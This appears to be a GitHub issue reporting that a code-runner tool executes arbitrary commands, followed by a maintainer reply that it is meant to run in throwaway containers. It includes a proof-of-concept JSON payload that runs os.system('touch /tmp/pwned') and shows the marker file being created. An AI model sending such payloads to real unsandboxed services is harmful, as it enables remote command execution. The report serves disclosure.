This program doesn't limit the execution of command, we can run arbitrarily command on this runner.
payload:
{ "language": "python", "files": [ { "name": "main.py", "content": "import os\nos.system('touch /tmp/pwned')" } ] }
output:
# ./runner { "language": "python", "files": [ { "name": "main.py", "content": "import os\nos.system('touch /tmp/pwned')" } ] } {"stdout":"","stderr":"","error":""} # ls |grep pwn pwned
If this program run on a website, it will cause remote command execution.
For example
The text was updated successfully, but these errors were encountered:
Indeed, this tool does not limit what can be run. You should only run this inside a container or similar. glot.io uses this inside glot-containers for sandboxing and the container is deleted after each run.
Sorry, something went wrong.
No branches or pull requests
This program doesn't limit the execution of command, we can run arbitrarily command on this runner.
payload:
output:
If this program run on a website, it will cause remote command execution.
For example

The text was updated successfully, but these errors were encountered: